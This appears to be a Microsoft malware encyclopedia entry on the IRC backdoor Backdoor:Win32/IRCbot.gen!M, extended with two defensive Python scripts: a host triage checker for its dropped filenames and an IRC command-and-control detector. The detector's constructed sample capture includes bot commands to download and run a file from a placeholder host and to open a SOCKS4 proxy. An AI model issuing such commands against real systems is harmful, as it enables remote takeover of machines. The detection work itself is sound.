Backdoor:Win32/IRCbot.gen!M


First posted on 14 August 2019.
Source: Microsoft

Aliases :

There are no other names known for Backdoor:Win32/IRCbot.gen!M.

Explanation :

Backdoor:Win32/IRCbot.gen!M is a generic detection for a backdoor trojan that allows unauthorized access to and control of an affected computer. It connects to a remote IRC server in order to receive commands from an attacker.

Installation

When executed, the malware usually copies itself to another location. The filename used by the malware varies; for example, the malware has been observed copying itself to the following locations:

dllcache\isass.exe
dllcache\winmdfy.exe
dllcache\qxchost.exe

Note that two of these names imitate the legitimate Windows binaries lsass.exe and svchost.exe, and that the dllcache directory normally holds protected copies of system files, so an executable there that is not a known system file warrants a closer look.

Backdoor:Win32/IRCbot.gen!M then executes that copy and may drop and execute a batch file that deletes its original executable. Note that the malware may also modify the system so that it runs as a service.

Spreads via exploit

Backdoor:Win32/IRCbot.gen!M may attempt to spread by exploiting particular vulnerabilities in remote computers.

Weak passwords

The malware contains a list of weak passwords that it uses to attempt to gain access to administrator accounts on remote computers running SQL Server.

Instant messaging

The malware checks whether any of the following instant messaging clients are running:

MSN Messenger
ICQ
Yahoo Messenger

If one is found, the malware clicks the relevant buttons in the client to send links to itself to entries in the contact list. The link that is sent is supplied by the attacker via a backdoor command.

Payload

Allows backdoor access and control

When executed, the malware connects to a remote IRC server and joins a particular channel in order to receive commands from a remote attacker. The remote attacker can command the malware to perform tasks such as the following:

Connect to a different IRC server or channel
Steal passwords from Protected Storage
Start or stop spreading via exploit and weak passwords
Start or stop spreading via instant messaging
Provide statistics on the number of successfully exploited hosts
Download and execute arbitrary files
Update to a new copy of the malware
Uninstall itself
Perform a denial of service attack on a remote host
Run a SOCKS4 proxy on the infected machine
Stop the currently executing malware process

Analysis by Ray Roberts
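As an added example for the Installation section above (not Microsoft's analysis and not code from this page), the following triage script checks a host's file listing and service table for the artefacts the write-up describes: the three observed filenames, executables under a dllcache directory whose names are near-misses of genuine system binaries, and services whose image path points into dllcache. The directory listing, the service entries, the legitimate-binary list and the extra lookalike file svch0st.exe are constructed for the demonstration; only isass.exe, winmdfy.exe and qxchost.exe come from the write-up.

```python
"""Host triage for the installation artefacts described above.

Added example, not Microsoft's analysis or code from this page. Input is a
constructed directory listing and service table in the shape you would
export from a suspect host; only the three filenames come from the write-up.
The legitimate-binary list, the service name and the extra lookalike file
are assumptions made for the demonstration.
"""
from __future__ import annotations

# Filenames named in the write-up (the page's only file indicators).
IOC_NAMES = {"isass.exe", "winmdfy.exe", "qxchost.exe"}

# Assumed: genuine system binaries that may legitimately have a copy in dllcache.
LEGIT_NAMES = {
    "lsass.exe", "svchost.exe", "csrss.exe", "smss.exe", "winlogon.exe",
    "services.exe", "spoolsv.exe", "explorer.exe", "notepad.exe",
}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; one substitution turns lsass.exe into isass.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name: str, max_distance: int = 2) -> str | None:
    """Return the legitimate binary that `name` imitates, or None.

    Exact legitimate names are never flagged: dllcache is meant to hold
    protected copies of real system files, so lsass.exe there is expected.
    """
    if name in LEGIT_NAMES or not name.endswith(".exe"):
        return None
    closest = min(LEGIT_NAMES, key=lambda legit: edit_distance(name, legit))
    return closest if edit_distance(name, closest) <= max_distance else None


def _parts(path: str) -> list[str]:
    """Lower-cased path components, accepting either slash style."""
    return [p for p in path.lower().replace("/", "\\").split("\\") if p]


def triage_files(paths: list[str]) -> list[tuple[str, str]]:
    """Return (path, reason) for every suspicious entry in a listing."""
    findings = []
    for path in paths:
        parts = _parts(path)
        name, in_dllcache = parts[-1], "dllcache" in parts[:-1]
        if name in IOC_NAMES:
            findings.append((path, f"filename {name} listed for IRCbot.gen!M"))
        elif in_dllcache and (target := lookalike_of(name)):
            findings.append((path, f"dllcache lookalike of {target}"))
    return findings


def triage_services(services: list[dict[str, str]]) -> list[tuple[str, str]]:
    """Flag services whose image path points into a dllcache directory."""
    return [
        (svc["name"], f"service binary under dllcache: {svc['image_path']}")
        for svc in services
        if "dllcache" in _parts(svc["image_path"])[:-1]
    ]


# Constructed sample inputs, not data from a real host.
SAMPLE_FILES = [
    r"C:\WINDOWS\system32\dllcache\lsass.exe",    # genuine protected copy
    r"C:\WINDOWS\system32\dllcache\isass.exe",    # name from the write-up
    r"C:\WINDOWS\system32\dllcache\winmdfy.exe",  # name from the write-up
    r"C:\WINDOWS\system32\dllcache\qxchost.exe",  # name from the write-up
    r"C:\WINDOWS\system32\dllcache\svch0st.exe",  # assumed lookalike, not on the page
    r"C:\WINDOWS\system32\svchost.exe",
]
SAMPLE_SERVICES = [
    {"name": "Spooler", "image_path": r"C:\WINDOWS\system32\spoolsv.exe"},
    # Hypothetical service name; the write-up says only that a service may be created.
    {"name": "ExampleSvc", "image_path": r"C:\WINDOWS\system32\dllcache\winmdfy.exe"},
]

if __name__ == "__main__":
    for item, reason in triage_files(SAMPLE_FILES) + triage_services(SAMPLE_SERVICES):
        print(f"{reason}: {item}")
```

The lookalike check deliberately never flags a name that is itself on the legitimate list, because dllcache is expected to contain real copies of lsass.exe and svchost.exe; tune LEGIT_NAMES to the Windows build you are examining, since an unlisted genuine binary could otherwise be reported as a near-miss of a listed one.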
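As an added example for the Payload section (not Microsoft's analysis and not code from this page), the detector below identifies the IRC command channel by protocol rather than by port: it parses each captured TCP flow as IRC (client NICK and USER, server 001 welcome, client JOIN, channel PRIVMSG from the operator) and reports flows that complete a registration and join a channel, whatever destination port they use. The flows, addresses, nick, channel name and the command strings ".download" and ".socks4" are constructed samples; the write-up lists the download-and-execute and SOCKS4 capabilities but not the command syntax, so those strings are assumptions.

```python
"""Spotting IRC command-and-control by protocol, not by port.

Added example, not Microsoft's analysis or code from this page. The write-up
says the bot registers with an IRC server, joins a channel and waits for
commands there, so the detection below parses each captured TCP flow as
IRC (client NICK/USER, server 001 welcome, client JOIN, channel PRIVMSG)
regardless of destination port. The flows, addresses, nick, channel and
command strings are constructed samples and assumptions, not observed data.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# RFC 1459 message shape: [":" prefix SPACE] command [SPACE params]
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+) )?(?P<cmd>[A-Za-z]+|\d{3})(?: (?P<params>.*))?$"
)


@dataclass
class IrcFlow:
    src: str
    dst: str
    dport: int
    nick: str | None = None
    registered: bool = False          # server sent 001 RPL_WELCOME
    channels: list[str] = field(default_factory=list)
    commands: list[str] = field(default_factory=list)  # channel messages the bot received


def parse_line(raw: str) -> tuple[str | None, str, list[str]] | None:
    """Split one IRC line into (prefix, COMMAND, params); None if not IRC-shaped."""
    m = IRC_LINE.match(raw.strip())
    if not m:
        return None
    params = m.group("params") or ""
    if " :" in params:                      # trailing parameter may contain spaces
        head, trail = params.split(" :", 1)
        args = head.split() + [trail]
    elif params.startswith(":"):
        args = [params[1:]]
    else:
        args = params.split()
    return m.group("prefix"), m.group("cmd").upper(), args


def analyse_flow(src: str, dst: str, dport: int,
                 records: list[tuple[str, str]]) -> IrcFlow | None:
    """Replay (direction, payload) records of one TCP flow; return the flow
    if it completed an IRC registration and joined at least one channel."""
    flow = IrcFlow(src, dst, dport)
    for direction, raw in records:
        parsed = parse_line(raw)
        if parsed is None:
            continue
        _prefix, cmd, args = parsed
        if direction == "c2s":
            if cmd == "NICK" and args:
                flow.nick = args[0]
            elif cmd == "JOIN" and args:
                flow.channels.extend(args[0].split(","))
        else:
            if cmd == "001":
                flow.registered = True
            elif cmd == "PRIVMSG" and len(args) == 2 and args[0] in flow.channels:
                flow.commands.append(args[1])
    return flow if flow.registered and flow.channels else None


# Constructed capture of a bot flow on a non-standard port (8080).
BOT_FLOW = [
    ("c2s", "NICK [US|XP]-48213"),
    ("c2s", "USER xpuser 0 * :xpuser"),
    ("s2c", ":irc.example.invalid 001 [US|XP]-48213 :Welcome to the network"),
    ("c2s", "JOIN #c2 secretkey"),
    ("s2c", ":[US|XP]-48213!xpuser@10.0.0.5 JOIN :#c2"),
    ("s2c", ":op!op@203.0.113.9 PRIVMSG #c2 :.download http://203.0.113.9/u.exe 1"),
    ("s2c", ":op!op@203.0.113.9 PRIVMSG #c2 :.socks4 1080"),
]
# Constructed HTTP flow that must not be mistaken for IRC.
HTTP_FLOW = [
    ("c2s", "GET /index.html HTTP/1.1"),
    ("c2s", "Host: example.invalid"),
    ("s2c", "HTTP/1.1 200 OK"),
]

if __name__ == "__main__":
    for src, dst, port, recs in [("10.0.0.5", "203.0.113.9", 8080, BOT_FLOW),
                                 ("10.0.0.5", "198.51.100.7", 80, HTTP_FLOW)]:
        hit = analyse_flow(src, dst, port, recs)
        if hit:
            print(f"IRC C2 {src} -> {dst}:{port} nick={hit.nick} "
                  f"channels={hit.channels} commands={hit.commands}")
```

The key is the 001 welcome from the server side: a client merely sending NICK and USER to a port could be a scanner or a mistaken connection, but a server that answers with RPL_WELCOME followed by a channel join is a live IRC session, and on a workstation that has no business running an IRC client that alone is worth an alert, with the captured channel messages as the evidence of tasking.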

Last update 14 August 2019
